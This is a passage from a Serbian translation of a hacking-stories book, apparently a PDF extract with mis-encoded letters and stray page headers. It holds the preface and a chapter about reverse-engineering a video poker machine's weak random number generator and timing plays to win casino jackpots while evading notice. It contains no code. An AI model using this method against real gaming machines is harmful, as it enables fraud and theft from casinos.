Embed Size (px)
Citation preview
ix
Predgovor
Hakeri – klinci i oni ne tako mladi – neprestano se nadmeñu meœusobom. Svakako bi se “proslavio” onaj ko bi se mogao pohvaliti upadomu Web prezentaciju moje kompanije za bezbednost, ili u moj liåni sistem.
Zadovoàstvo bi im priåinilo i ako bi uspeli da izmisle priåu o upadu uneki sistem i predstave je meni i koautoru ove kçige, Bilu Sajmonu, takouveràivo da nas ona ponese, da poverujemo u çu i ukàuåimo je u kçigu.
To je pred nas dvojicu postavilo fascinirajuñi izazov, borbu umovakoja se odvijala svaki put kada smo vodili razgovore za ovu kçigu. Veñi-na novinara i pisaca lako utvrœuje autentiånost izjave. Da li je osoba skojom razgovaraju zaista osoba za koju se predstavàa? Da li ta osoba je-ste ili je bila na poloæaju koji navodi? Da li ta osoba radi ili je radila zanavedenu organizaciju? Da li ta osoba ima dokumenta kojima bi pot-krepila priåu, i moæe li se utvrditi da su ta dokumenta vaàana? Postoje lipouzdani àudi koji ñe podræati priåu ili neke çene delove?
Ali, iskrenost hakera malo je teæe proveriti. Veñina àudi åije se priåenalaze u ovoj kçizi, osim nekoliko çih koji su veñ bili u zatvoru, bili bisudski goçeni ako bi çihov pravi identitet bio utvrœen. Zbog toga jemalo verovatno da ñe vam oni otkriti svoja prava imena kao dokaz.
Ispriåali su mi svoje priåe samo zato ãto mi veruju. Znaju da sam biou zatvoru, i oslaçaju se na to da ih neñu izdati i dovesti u situaciju u ko-joj sam i sâm bio. Uprkos rizicima, mnogi od çih su ponudili opipàivedokaze svojih upada.
Naravno, moguñe je – zapravo, verovatno je – da su neki i preuve-liåali svoje “uspehe”, dodajuñi priåama detaàe koji ih åine zanimài-vijim, ili da su razvili potpuno izmiãàene priåe, ali su ih zasnovali naostvarivim podvizima, tako da zvuåe istinito.
Zbog tih rizika, åvrsto smo se pridræavali visokih standarda pouzda-nosti. U svim razgovorima ispitivao sam svaki tehniåki detaà, traæio de-taàna objaãçeça svega ãto nije zvuåalo verodostojno, a ponekad sam se
x
Um
eñe
pro
vale
kasnije vrañao na istu priåu da bih video da li je i daàe ista, ili ñe sago-vornik neãto izmeniti. Sumçu su budile osobe koje “nisu mogle da sesete” kako su izvele neki teæak korak i izostavile ga iz priåe. Takoœe, ni-sam verovao osobama koje nisu izgledale kao da znaju dovoàno da biuradile ono ãto tvrde da jesu, ili nisu mogle da objasne kako su stigle odtaåke A do taåke B.
Osim tamo gde je izriåito navedeno drugaåije, sve glavne priåe uovoj kçizi poloæile su moj test verovatnoñe. Bil i ja smo se sloæili okouveràivosti svake osobe åija je priåa ukàuåena u kçigu. Meœutim, de-taàe smo åesto meçali da bismo zaãtitili i hakera i ærtvu.
U isto vreme, poãto kompanije koje prave softver i hardver stalnootklaçaçu bezbednosne propuste pomoñu zakrpa i novih verzija proiz-voda, samo joã neki podvizi opisani u kçizi i daàe imaju isti efekat. Pre-viãe samopouzdan åitalac mogao bi pomisliti da nema o åemu da brine –poãto ñe nedostaci biti otkloçeni ili veñ jesu, on ili çegova kompanijanemaju åega da se plaãe. Meœutim, lekcija koju treba da nauåite iz ovihpriåa jeste da hakeri pronalaze nove slabosti svaki dan. Proåitajte kçigu– ne da biste saznali pojedinaåne nedostatke pojedinaånih proizvoda,veñ da biste promenili svoje stavove i postali odluåniji.
Proåitajte je i da biste se zabavili, i poåeli da boàe shvatate iznenaœu-juñe podvige ovih opasno veãtih hakera.
Neke priåe su ãokantne, neke ñe vam otvoriti oåi, a u nekima ñete senasmejati inspiraciji i drskosti hakera. Ukoliko se bavite informacionimtehnologijama ili bezbednoãñu, iz svake priåe saznañete kako da svojuorganizaciju uåinite sigurnijom. Ako niste tehniåki nastrojeni, ali volitekriminalistiåke priåe, pune drskosti, rizika i hrabrosti, sve to ñete pro-nañi u ovoj kçizi.
Svaka opisana avantura suoåava se sa opasnoãñu nailaska na vrata izakojih, sa spremnim lisicama, åeka åitava potera policajaca, FBI agenata itipova iz tajne sluæbe. U mnogim sluåajevima, upravo to se i desilo.
Za one ostale, ta moguñnost i daàe postoji. Nije ni åudo ãto neki odovih hakera nikada ranije nisu hteli da ispriåaju svoje avanture. Veñinaonih o kojima ñete åitati u ovoj kçizi objavàena je po prvi put.
1
Poglavlje 1
Hakerisanjem kazina do milion dolara
Kad god [neki programer] kaæe: “Niko se neñe muåiti oko toga”, naœese klinac u Finskoj raspoloæen da se pomuåi.
– Aleks Mejfild
æivotu svakog kockara doœe magiåan trenutak kad jednostavnauzbuœeça prerastu u 3D fantazije – momenat kada pohlepaproguta etiku, a sistem kazina postane samo joã jedna planina
koja åeka da bude osvojena. U tom trenutku, maãtaçe o proverenomnaåinu da se pobede stolovi ili maãine oduzima dah.
Aleks Mejfild i çegova tri druga nisu samo saçarili. Kao i mnogidrugi upadi, i ovaj je poåeo kao veæba inteligencije, provera da li jeneãto moguñe. Na kraju, çih åetvorica su pobedili sistem i olakãali ka-zina za “oko milion dolara”, priåa Aleks.
Ranih devedesetih, åetiri prijateàa su radila kao savetnici za visoketehnologije i æiveli opuãteno i nonãalantno. “Znate veñ – radite, zaradi-te neke pare, a onda ne radite dok ne ostanete ãvorc.”
Las Vegas je bio daleko – dekor za snimaçe filmova i TV serija.Upravo zato, kada je firma za razvoj tehnologije ponudila momcimazadatak da naprave softver i isprate ga na tamoãçu konvenciju o viso-koj tehnologiji, oni su ponudu oberuåke prihvatili. To bi im bila prvaposeta Vegasu, ãansa da i sami vide bàeãtava svetla, i to s plañenim troã-kovima. Ko bi to odbio? Zasebni apartmani u velikom hotelu znaåili suda zabavi mogu da se pridruæe i Aleksova supruga i Majkova devojka.Dva para, plus Lari i Marko, otisnuli su se put vrelog Grada greha.
U
2
Um
eñe
pro
vale
Aleks kaæe da nisu znali mnogo o kockaçu niti o tome ãta da oåeku-ju. “Izaœete iz aviona, a svuda oko vas starije gospoœe igraju na slot maãi-nama. Sve to izgleda smeãno i ironiåno, i uvuåe vam se u svaku poru.”
Poãto su zavrãili posao na sajmu, åetiri prijateàa i dve dame otiãli suu kazino u svom hotelu, igrali na slot maãinama i uæivali u besplatnimpivima, kada je Aleksova supruga pred çih postavila izazov.
Zar ove maãine nisu zasnovane na raåunarima? Momci, vi setime bavite, zar ne moæete da uåinite neãto da bismo osvojiliviãe novca?
Drugari su se preselili u Majkov apartman i poåeli da izbacuju pi-taça i postavàaju teorije o naåinu na koji aparati rade.
Istraæivaçe
To je bio okidaå. “Sve to nas je zainteresovalo i, po povratku kuñi, poåelismo da ispitujemo stvar”, priåa Aleks, oæivàavajuñi señaça na kreativnufazu. Vrlo brzo, istraæivaçe je podræalo ono ãto su veñ pretpostavàali.“Da, to su u osnovi raåunarski programi. Zanimalo nas je postoji linaåin da provalimo te maãine?”
Neki àudi su pobedili slot maãine tako ãto su “zamenili firmver” – umaãinu bi ubacili kompjuterski åip i program zamenili drugim koji biomoguñio atraktivnije isplate nego ãto je kazino predvideo. Mada sudrugi timovi to radili, åinilo se da takva akcija zahteva dogovor s rad-nikom kazina, i to ne sa bilo kojim radnikom, veñ s tehniåaremzaduæenim za slot maãine. Za Aleksa i çegove ortake “zameçivaçeROM-ova bilo je kao tresnuti baku po glavi i oteti joj taãnu”. Zakàuåilisu da bi se u sve to upuãtali samo ako bi cela akcija bila izazov za çihoveprogramerske veãtine i intelekt. Povrh svega, oni nisu bili naroåito ta-lentovani za laæno predstavàaçe (engl.
social egineering
). Bavili su seraåunarima, ali nisu znali kako da priœu zaposlenom u kazinu i predloæeda im se pridruæi u maçoj prevari kojom ñe uzeti neãto tuœeg novca.
Ali kako ñe reãiti problem? Aleks je objasnio:
Pitali smo se da li bismo mogli predvideti sekvencu karata. Ili,da li moæda postoje zadça vrata [programski kôd koji omo-guñava kasniji neovlaãñen pristup programu], koja je neki pro-gramer napravio radi sopstvene koristi. Sve programe su pisali
3
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
programeri, a oni su vragolasti stvorovi. Pomislili smo dabismo mogli nabasati na zadça vrata, na primer tako ãtoñemo pritisnuti odreœenu sekvencu dugmadi i tako promenitiverovatnoñu dobitka, ili sami programirati pukotinu kojubismo mogli da iskoristimo.
Aleks je proåitao kçigu
The Eudaemonic Pie
Tomasa Basa (ThomasBass) (Penguin, 1992), priåu o grupi momaka koji su se bavili raåunari-ma i fizikom. Oni su osamdesetih pobedili rulet u Las Vegasu koristeñisopstvenu verziju “prenosivog” raåunara, veliåine pakle cigareta, koji jepredviœao rezultat na ruletu. Jedan ålan tima za stolom pritiskao je dug-mad unoseñi brzinu toåka ruleta i naåin rotiraça kuglice. Raåunar jeradio-talasima prenosio tonove u sluãni aparat drugog ålana tima koji jetumaåio signal i kladio se na odgovarajuñi broj. Oåekivali biste da suodneli tonu novca, ali nisu. Po Aleksovom miãàeçu, “Njihova ãema jeimala ogroman potencijal, ali je bila sputana nezgrapnom i nepouzda-nom tehnologijom. Takoœe, bilo je previãe uåesnika, pa su problempredstavàali i ponaãaçe i meœusobni odnosi. Mi smo reãili da ne pono-vimo çihove greãke.”
Aleks je zakàuåio da bi bilo lakãe pobediti igru zasnovanu na raåu-naru “jer su raåunari potpuno predvidivi” – rezultat zavisi od onoga ãtose prethodno desilo, ili, da parafraziramo staru izreku vezanu za laænopredstavàaçe, ubaciã dobre podatke, dobijeã dobre podatke. (Origi-nalan izraz na ovo gleda iz negativne perspektive: “ubaciã œubre, dobijeãœubre”.)
To mu je savrãeno odgovaralo. Kao mladiñ, Aleks je bio muziåar, svi-rao je u kultnom bendu i saçao o tome da postane rok zvezda, a kadato nije uspelo, prebacio se na prouåavaçe matematike. Imao je talentaza matematiku i, mada nikada nije mario za ãkole (napustio je koledæ),nastavio je da se bavi tom temom sve dok nije stekao solidan nivoznaça.
Poãto je zakàuåio da je istraæivaçe neophodno, otputovao je uVaãington i proveo neko vreme prouåavajuñi dokumentaciju u zavoduza patente. “Pomislio sam da je neko moæda bio dovoàno glup da savkôd ubaci u patent” za videopoker aparat. I naravno, bio je u pravu. “Uto vreme, strpati gomilu objektnog koda u patent bio je naåin da pod-nosilac patenta zaãtiti svoj izum, jer kôd sadræi detaàan opis izuma, ali uobliku koji nije naroåito razumàiv korisnicima. Uzeo sam mikrofilm sa
4
Um
eñe
pro
vale
objektnim kodom i pregledao strane pune heksadecimalnih brojevatraæeñi zanimàive odeàke, koji su morali biti pretvoreni [u upotrebàivoblik]”.
Analiziraçe koda otkrilo je nekoliko tajni koje su zaintrigirale tim,ali su zakàuåili da se, ukoliko bi da odmaknu daàe, moraju doåepatikonkretne maãine koju hoñe da hakeriãu, i sami pogledaju kôd.
Njih åetvorica su åinili dobro usklaœen tim. Majk je bio viãe negokompetentan programer, i znao je viãe o hardveru nego ostala trojica.Marko, joã jedan bistar programer, bio je emigrant iz Istoåne Evrope ti-nejdæerskog izgleda. Ali, bio je priliåno smeo pametçakoviñ koji jesvemu prilazio sa stavom “mogu ja to”. Aleks je bio odliåan programer idoprineo je svojim poznavaçem ãifrovaça. Lari nije bio naroåito dobarprogramer, a zbog udesa s motorom nije mogao mnogo da putuje.Meœutim, on je bio odliåan organizator koji je usmeravao projekat i vo-dio raåuna da se svi fokusiraju na ono ãto u odreœenoj fazi treba obaviti.
Posle poåetnih istraæivaça, Aleks je “zaboravio” na projekat. AliMarko se zagrejao za ideju. Nastavio je da insistira: “Nije to nikakavproblem, maãine se mogu legalno kupiti u trinaest dræava”. Na kraju jeuspeo da ubedi ostale da pokuãaju. “Pomislili smo, ãto da ne.” Uspeli suda izdvoje dovoàno novca za put i kupovaçe maãine. Ponovo su seuputili u Vegas – ovaj put o svom troãku i s drugim ciàem na pameti.
Aleks priåa: “Da biste kupili slot maãinu, trebalo je samo da uœete uradçu i pokaæete liånu ispravu iz dræave u kojoj takvu maãinu moæetelegalno posedovati. Ukoliko ste imali vozaåku dozvolu iz neke od tihdræava, niko vas nije previãe ispitivao.” Jedan od çih je imao zgodnuvezu sa stanovnikom dræave Nevada. “Bio je to ujak neåije devojke, ilitako neãto, i on je æiveo u Vegasu.”
Odluåili su da Majk razgovara s tim åovekom jer “ima dræaçe trgov-ca i vrlo je reprezentativan tip. Pretpostavàa se da ñete maãinu koristitiza nelegalno kockaçe. Isto kao sa oruæjem”, Aleks je objasnio. Mnogomaãina je dospevalo na “sivo træiãte” – prodavano je van dozvoàenih ka-nala klubovima i sliånim mestima. Ipak, iznenadilo ga je ãto su moglida kupe “potpuno isti aparat kao ãto su oni u kazinu”.
Majk je åoveku dao 1.500 dolara za maãinu japanske proizvodçe.“Onda smo nas dvojica utovarili prokletiçu u kola. Vozili smo kuñi kaoda na zadçem sediãtu imamo bebu.”
5
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
Razvijaçe upada
Majk, Aleks i Marko su odteglili aparat uz stepenice, na drugi spratkuñe u kojoj su mogli da koriste slobodnu spavañu sobu. Ovo iskustvoje Aleks dugo pamtio kao jedno od najveñih uzbuœeça u svom æivotu.
Otvorili smo je, izvadili ROM i utvrdili koji je to procesor. Jasam odluåio da uzmemo japansku maãinu koja je izgledalakao imitacija jedne poznate marke. Pomislio sam da suinæeçeri moæda bili pod veñim pritiskom, pa su bili leçi ilimalo nemarniji.
Ispostavilo se da sam bio u pravu. Koristili su [åip] 6809,sliåan åipu 6502 koji ste mogli nañi u raåunaru Apple II iliAtari. Bio je to 8-bitni åip s memorijom od 64K. Poãto samprogramirao na asemblerskim jezicima, bio mi je poznat.
Aparat koji je Aleks odabrao koristio se veñ desetak godina. Kad godkazino hoñe da kupi maãinu novog dizajna, Komisija za kockaçe (LasVegas Gaming Commission) mora da prouåi program i pobrine se daon bude takav da isplate igraåima budu poãtene. Odobravaçe novogdizajna moæe potrajati, pa kazina zadræavaju stare aparate duæe nego ãtobiste oåekivali. Åinilo se da ñe starija maãina verovatno sadræati preva-ziœenu tehnologiju i tim se nadao da ñe je lakãe napasti.
Raåunarski kôd koji su preuzeli sa åipa bio je u binarnom obliku –niz jedinica i nula koje predstavàaju osnovni nivo kompjuterskih uput-stava. Da bi ih preveli u oblik s kojim bi mogli da rade, prvo su moralida se pozabave reverznim inæeçeringom (engl.
reverse engineering
) –procesom kojim inæeçer ili programer utvrœuje kako je postojeñi proiz-vod projektovan. U ovom primeru, to je znaåilo prevoœeçe jezika maãi-ne u kôd koji su momci mogli da razumeju i s kojim su mogli da rade.
Aleksu je trebao “disasembler” za prevoœeçe koda. Åetvorka nijehtela da izazove sumçu kupovinom programa – to bi bilo kao da suotiãli u biblioteku i pozajmili kçige o pravàeçu bombe. Sami su napi-sali disasembler, a Aleks taj posao opisuje kao “ne baã prost ko pasuà, alizabavan i relativno lak”.
Poãto su kôd iz poker aparata propustili kroz novi disasembler, triprogramera su sela i poåela da prolivaju znoj nad çim. Viåan projek-tant softvera obiåno brzo pronalazi delove programa na koje hoñe da se
6
Um
eñe
pro
vale
usredsredi. To je zato ãto osoba koja piãe kôd svud po çemu ostavàasaobrañajne znake – napomene, komentare i primedbe koji objaãçava-ju funkciju svakog dela koda, sliåno kao ãto kçiga ima naslove delova,poglavàa, i podnaslove odeàaka unutar poglavàa.
Kada se program prevede u oblik koji maãina moæe da proåita, ti sao-brañajni znaci se ignoriãu – raåunaru ili mikroprocesoru oni ne trebaju.Zbog toga, kodu dobijenom ovakvom analizom nedostaju ta korisnaobjaãçeça. Da se opet posluæimo metaforom “saobrañajnih znakova” –ovako dobijen kôd liåi na mapu bez imena mesta, bez oznaka autopute-va ili ulica.
Pregledali su strane koda na ekranu traæeñi odgovore na osnovna pi-taça: “Koja logika je primeçena? Kako se karte meãaju? Kako se birajukarte za zamenu?” Ipak, u tom trenutku najvaænije im je bilo dapronaœu kôd “generatora sluåajnih brojeva” (engl.
random number gene-rator
). Aleks je ispravno pretpostavio da su japanski programeri koristilipreåice koje su ostavile greãke u kodu generatora sluåajnih brojeva. Za-ista su ih koristili.
Ponovno pisaçe koda
Aleks ponosno opisuje svoj trud. “Bili smo programeri i bili smo dobri uonome ãto smo radili. Shvatili smo kako se brojevi u kodu pretvaraju ukarte na maãini i napisali smo kôd na jeziku C koji ñe raditi isto”,ispriåao je.
Imali smo motivaciju i non-stop smo radili. Mislim da nam jetrebalo dve ili tri nedeàe da doœemo do taåke kada smo zaistaznali ãta se deãava u kodu.
Pogledaã kôd, pretpostaviã åemu sluæi, napiãeã nov kôd, baciãga na ROM [raåunarski åip], vratiã u aparat i gledaã ãta sedeãava. Pisali smo rutine koje na ekranu preko karata ispisujuheksadecimalne brojeve. Tako smo dobili neku vrstu pregledanaåina na koji kôd deli karte.
Bila je to kombinacija pokuãaja i greãaka i dubinske analize.Kôd je vrlo brzo poåeo da poprima smisao. Gotovo preciznosmo shvatili kako se brojevi u raåunaru pretvaraju u karte naekranu.
7
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
Nadali smo se da je generator sluåajnih brojeva bio relativnojednostavan. A ranih devedesetih bio je upravo takav. Malosam istraæivao i otkrio da je zasnovan na neåemu ãto jeDonald Knut napisao joã ãezdesetih. Ti tipovi nisu niãta izmi-slili, samo su iskoristili postojeñe istraæivaçe metoda iz MonteKarla i sliånih stvari, i ubacili ga u svoj kôd.
Otkrili smo taåan algoritam koji su koristili za generisaçekarata. Zove se linearni pomiåni registar sa povratnom vezom(engl.
linear feedback shift register, LFSR
) i priliåno je dobargenerator sluåajnih brojeva.
Meœutim, uskoro su otkrili da ovaj generator ima fatalnu greãkukoja im je mnogo olakãala posao. Majk je objasnio da je to bio “relativ-no jednostavan 32-bitni generator sluåajnih brojeva, pa je bilo moguñedostiñi sloæenost izraåunavaça potrebnu za çegovo provaàivaçe, a uznekoliko dobrih optimizacija stvar je postala gotovo trivijalna”.
Znaåi, dobijeni brojevi nisu bili zaista nasumiåni. Aleks smatra dapostoji dobar razlog zaãto je moralo biti tako.
Ukoliko bi brojevi zaista bili nasumiåni, ne biste mogli pode-siti kvote. Ne bi mogli da se procene izgledi. Neki aparati uza-stopno daju fleã rojale. A oni ne bi trebali uopãte da sepojavàuju. Zbog toga projektanti æele moguñnost provereispravnosti statistike, inaåe imaju oseñaj da ne kontroliãu igru.
Druga stvar koju projektanti nisu shvatili kada su napraviliovaj aparat, jeste to da im ne treba samo generator sluåajnihbrojeva. Statistiåki u svakom deàeçu ima deset karata – petkoje se vide na poåetku, i po jedna zamena za svaku od poået-nih karata koja ñe se pojaviti ukoliko igraå odluåi da je odbaci.Ispostavilo se da su rane verzije aparata tih deset karata uzi-male iz deset sekvencijalnih nasumiånih brojeva u generatorusluåajnih brojeva.
Tako su Aleks i çegovi partneri shvatili da su programske instrukcijeovih starijih maãina loãe smiãàene. A zbog tih greãaka videli su da mogunapisati relativno jednostavan, ali elegantan i domiãàat algoritam kojimñe pobediti maãinu.
8
Um
eñe
pro
vale
Aleks je primetio da je trik u tome da poånete igru, vidite koje sukarte prikazane na maãini, i unesete podatke za identifikovaçe tih kara-ta u raåunar kod kuñe. Algoritam ñe izraåunati gde je generator sluåaj-nih brojeva bio i kroz koliko brojeva treba da proœe pre nego ãto budespreman da prikaæe æeàene karte – fleã rojal.
Seli smo za naã aparat, pokrenuli svoj programåiñ i on nam jetaåno rekao koja ñe biti sledeña sekvenca karata. Bili smo pri-liåno uzbuœeni.
To uzbuœeçe Aleks je pripisao oseñaçu “da ste pametniji od nekogai znate da ga moæete pobediti. A to ñe, u naãem sluåaju, doneti i novac”.
Otiãli su u kupovinu i pronaãli ruåni sat marke Casio s funkcijomodbrojavaça koja se moæe podesiti na desetine sekunde. Kupili su trisata, po jedan za svakog ålana koji ñe iñi u kazina. Lari ñe ostati u bazi iodræavati raåunar.
Bili su spremni za testiraçe metode. Jedan ålan tima bi poåeo daigra i javio bi koje je karte dobio – broj i boju svih pet karata. Lari biuneo podatke u çihov raåunar. Mada je çegova marka bila maçe po-znata, bio je to popularan raåunar kod zaluœenika i odliåan izbor za ovunamenu, jer je imao mnogo bræi åip od onog u japanskom poker apara-tu. Trebalo mu je samo nekoliko trenutaka da izraåuna taåno vreme zaodbrojavaçe koje treba podesiti na Casio satu.
Kada se sat oglasi, igraå na slot maãini treba da pritisne dugme Play.Ali, to je morao uraditi u deliñu sekunde. Aleks objaãaçava da to i nijebio toliko veliki problem kako se moæda åini.
Nas dvojica smo neko vreme bili muziåari. Kada ste muziåar iimate dovoàno oseñaja za ritam, moæete pritisnuti dugme skaãçeçem maçim od pet milisekundi.
Ukoliko sve bude radilo kao ãto je planirano, aparat ñe prikazatitraæeni fleã rojal.
Veæbali su na svom aparatu dok svi nisu uspeli da otvore fleã rojal na-kon prihvatàivog broja pokuãaja.
U prethodnim mesecima, po Majkovoj priåi, oni su “izdvojili pro-gramski kôd aparata, precizno utvrdili kako se sluåajni brojevi pre-tvaraju u karte na ekranu, taåno odredili kada i koliko brzo generator
9
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
sluåajnih brojeva pravi petàu, nauåili sve bitne specifiånosti maãine irazvili program koji ñe sve te promenàive uzimati u obzir. Kada vam jepoznato staçe pojedinaåne maãine u odreœenom trenutku, s visokompreciznoãñu moæete predvideti ponavàaçe sluåajnih brojeva u bilo komtrenutku u sledeñih nekoliko sati, pa åak i dana”.
Pobedili su maãinu – pretvorili je u svog roba. Prihvatili su intelek-tualni izazov koji je upad postavio i pobedili su. Znaçe je moglo da ihuåini bogataãima.
Bilo je lepo saçariti o tome. Ali, da li su zaista mogli da izvedu ak-ciju u dæungli kazina?
Povratak u kazina – ovaj put radi igre
Jedna je stvar privatno petàati oko svog aparata, na bezbednoj lokaciji.Sesti usred prepunog kazina i ukrasti novac – to je potpuno druga priåa.Za to su potrebni åeliåni æivci.
Njihove dame su mislile da putuju samo radi zabave. Momci su ihohrabrili da obuku uske sukçice i upadàivo se ponaãaju – kockaju se,priåaju, kikoñu, naruåuju piña – nadajuñi se da ñe àudi iz obezbeœeçakoji upravàaju kamerama biti ometeni lepim licima i oblinama. “Zatosmo insistirali na tome ãto smo viãe mogli”, seña se Aleks.
Nadali su se da ñe se uklopiti, stopiti s masom. “Majk je bio najboài.Bio je proñelav, i on i çegova supruga su izgledali kao tipiåni igraåi.”
Aleks opisuje scenu kao da se sve desilo juåe. Marko i Majk su akcijuopisali malo drugaåije, ali evo kako je sve izgledalo Aleksu. Sa svojom su-prugom Eni prvo je obiãao kazino i odabrao jedan video poker aparat.Morao je s velikom preciznoãñu znati taåan ciklus maãine. Jedna metodakoju su koristili bila je da video kameru stave u torbicu. U kazinu biigraå postavo torbicu tako da objektiv kamere bude usmeren na ekranpoker aparata i dræao je neko vreme ukàuåenu. “Bilo je nezgodno”, señase, “postaviti torbu na odgovarajuñe mesto, a pri tom ne izgledati kao daje poloæaj torbe bitan. Prosto, ne æelite da uradite niãta ãto bi delovalosumçivo i privlaåilo paæçu.” Majk je viãe voleo drugu metodu, koja jebila maçe zahtevna: “Ciklus ponavàaça brojeva na nepoznatom apara-tu izraåunavali smo pomoñu dva oåitavaça karata sa ekrana, u razmakuod viãe sati.” Morao je biti siguran da na maãini u meœuvremenu nikonije igrao jer bi se time promenila brzina ponavàaça, ali to je bilo lako:
10
Um
eñe
pro
vale
samo je trebalo da proveri da li su na ekranu prikazane karte koje jeostavio kada je posledçi put igrao na maãini, a to je obiåno bio sluåaj jerse na “maãinama s visokim ulozima ne igra åesto”.
Nakon drugog uåitavaça prikazanih karata, podesio bi odbrojavaçena Casio satu, a potom bi telefonom javio Lariju podatke o vremenu isekvencama karata. Lari bi ih uneo u çihov raåunar i pokrenuo program.Na osnovu tih podataka, raåunar bi predvideo vreme sledeñeg fleã rojala.“Nadate se da ñe se to desiti u roku od nekoliko sati, ali ponekad je treba-lo da proœe nekoliko dana”, pa bi u tom sluåaju pokuãali s drugim apara-tom, åesto u drugom hotelu. Podeãeno vreme na Casio satu moglo bi bitipromaãeno i za oko minut, ali ipak je bilo dovoàno precizno.
Aleks i Eni su se u kazino vrañali dosta ranije u sluåaju da je neko seoza aparat koji oni æele, i igrali na drugim aparatima dok çihov ne budeslobodan. Aleks bi seo za ciàni aparat, a Eni za aparat do çega. Poåeli bida igraju i trudili se da izgledaju kao da se zabavàaju. A onda:
Ja bih poåeo da igram, podeãavajuñi tajmer na ruånom satu.Zapamtio bih podeàene karte – vrednost i boju svih petkarata, a potom nastavio da igram sve dok ne zapamtim osamkarata u sekvenci. Klimnuo bih svojoj æeni kao znak da odla-zim i krenuo ka zakloçenijoj javnoj govornici izvan dvoranekazina. Imao sam oko osam minuta da odem do telefona, oba-vim ãta sam morao i vratim se za aparat. Moja æena je nasta-vàala da igra. Ukoliko bi neko hteo da koristi moj aparat, onabi mu rekla da tu sedi çen suprug.
Smislili smo naåin da pozovemo Larijev broj pejdæera i dapreko brojeva na tastaturi telefona unesemo karte. Tako nismomorali da izgovaramo oznake karata – àudi iz kazina uvekosluãkuju takve stvari. Lari bi ponovo uneo karte u raåunar ipokrenuo program.
Potom bih ga pozvao. On bi sluãalicu dræao iznad raåunarakoji bi dao dva kratka zvuåna signala. Kada bih åuo prvizvuk, pritisnuo bih pauzu na brojaåu sata i zaustavio odbro-javaçe. Kada bih åuo drugi zvuk, ponovo bih pritisnuopauzu da bih restartovao brojaå.
11
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
Karte koje je Aleks javàao govorile su raåunaru taåan poloæaj na komje bio generator sluåajnih brojeva poker aparata. Unoãeçem kaãçeçakoje je odredio raåunar, Aleks je unosio kàuånu ispravku u brojaå svogCasio sata tako da se on oglasi taåno u trenutku kada ñe se pojaviti fleãrojal.
Poãto bih restartovao brojaå sata, vrañao sam se aparatu. Kadabi se brojaå oglasio sa “bip, bip, bum” – baã tada, u trenutkutog “bum”, ponovo bih pritisnuo dugme Play na aparatu.
U tom prvom pokuãaju mislim da sam osvojio 35.000 dolara.
Doãli smo do oko 30 ili 40 procenata uspeãnosti jer je sve bilodobro razraœeno. Nismo uspevali samo kada bismo unelipogreãno vreme.
Kada je prvi put osvojio novac, Aleks je bio “veoma uzbuœen, aliuplaãen. Nadzornik stolova je bio neki namrgoœeni Italijan. Bio sam si-guran da me åudno gleda, sa zbuçenim izrazom lica, moæda zato ãtosam stalno telefonirao. Mislim da je otiãao da presluãa trake.” Uprkosnapetosti, imalo je to “svojih åari”. Majk se priseña: “Naravno, bio samnervozan jer je neko mogao da primeti moje sumçivo ponaãaçe, ali za-pravo, niko me nije åudno gledao. Mene i moju suprugu tretirali su kaoi druge dobitnike visokih uloga – åestitali su nam i davali poklone.”
Bili su toliko uspeãni da su morali voditi raåuna o tome da ne osvojepreviãe novca i ne privuku paæçu na sebe. Suoåili su se s retkim proble-mom prevelikog uspeha. “Sve je bilo vrlo javno. Osvajali smo ogromnedæek potove u desetinama hiàada dolara. Fleã rojal ima kvotu 4000 pre-ma 1. Na aparatu u koji se ubacuje 5 dolara, to je dvadeset hiàada.”
Cifre su i veñe. Neke igre su progresivne – glavni zgoditak raste svedok ga neko ne osvoji, a ovi momci su mogli i çih lako da dobiju.
Osvojio sam jedan koji mi je doneo 45 hiàada. Priãao mi je teh-niåar sa ãirokim pojasom – on verovatno i popravàa maãine. Tajåovek ima poseban kàuå koji nemaju àudi ãto rade u dvorani.Otvori kuñiãte, izvadi [elektronsku] ploåu, izvadi ROM åippred vama. Sa sobom nosi åitaå ROM-a i testira åip iz maãineporedeñi ga sa zlatnim masterom koji se åuva pod kàuåem.
12
Um
eñe
pro
vale
Aleks je saznao da je provera ROM-a standardna procedura veñ viãegodina. Pretpostavàa da su ih “dosad dosta ispaàivali”, pa su najzad ot-krili kako da izvedu proveru ROM-a kao protivmeru.
Aleksova izjava me je navela da se zapitam da li kazina obavàaju oveprovere jer su neki tipovi koje sam sreo u zatvoru zameçivali firmver.Pitao sam se kako su to mogli tako brzo da obave i izbegnu otkrivaçe.Aleks smatra da je tajna u laænom predstavàaçu – sigurno su se dogo-vorili sa obezbeœeçem i potplatili nekog u kazinu. On je pretpostavàaoda su moæda zamenili i zlatni master s kojim se poredi åip iz aparata.
Aleks ostaje pri tome da je lepota upada koji je obavio çegov timbila je u tome ãto nisu morali da meçaju firmver. A smatrali su da jeçihov pristup bio i mnogo veñi izazov.
Tim nije smeo da nastavi da osvaja toliko novca. “Bilo je jasno da ñeneko sabrati dva i dva i reñi: ’Ovog tipa sam veñ negde video‘. Uplaãilismo se da ñe nas uhvatiti.”
Pored stalno prisutnih briga da ñe biti uhvañeni, morali su se pozaba-viti i pitaçem poreza. Za svaki dobitak preko 1.200 dolara, kazino traæiliåna dokumenta i isplatu prijavàuje poreskoj sluæbi. Majk kaæe: “Pret-postavàali smo da ñe, ukoliko igraå ne dâ liånu kartu, porez biti odbijenod dobitka, ali nismo hteli da privlaåimo paæçu otkrivajuñi da li je tapretpostavka taåna.” Plañaçe poreza “nije bilo veliki problem”, ali “onoostavàa podatke koji govore da osvajate nenormalne koliåine novca.Zbog toga se mnogo planiraça odnosilo na pronalaæeçe naåina daostanemo u potaji.”
Morali su da smisle drugaåiji pristup. Nakon krañeg vremena telefo-niraça kuñi, rodila se nova ideja.
Nov pristup
Ovaj put momci su imali dva ciàa: razvijaçe metode koja bi imomoguñila da otvore ful, kentu ili pet karata iste boje, tako da isplate nebudu homogene i ne privlaåe paæçu. Drugi cià je da cela akcija budemaçe oåigledna i maçe dosadna od stalnog tråkaraça do telefona presvake igre.
Poãto je u kazinima postojao ograniåen broj japanskih aparata,momci su se ovaj put ustremili na ameriåku maãinu koja se viãe koristi.Rastavili su je na isti naåin i otkrili da je proces generisaça sluåajnih
13
Poglavlje 1
: Hakerisan
jem kazin
a do m
ilion d
olara
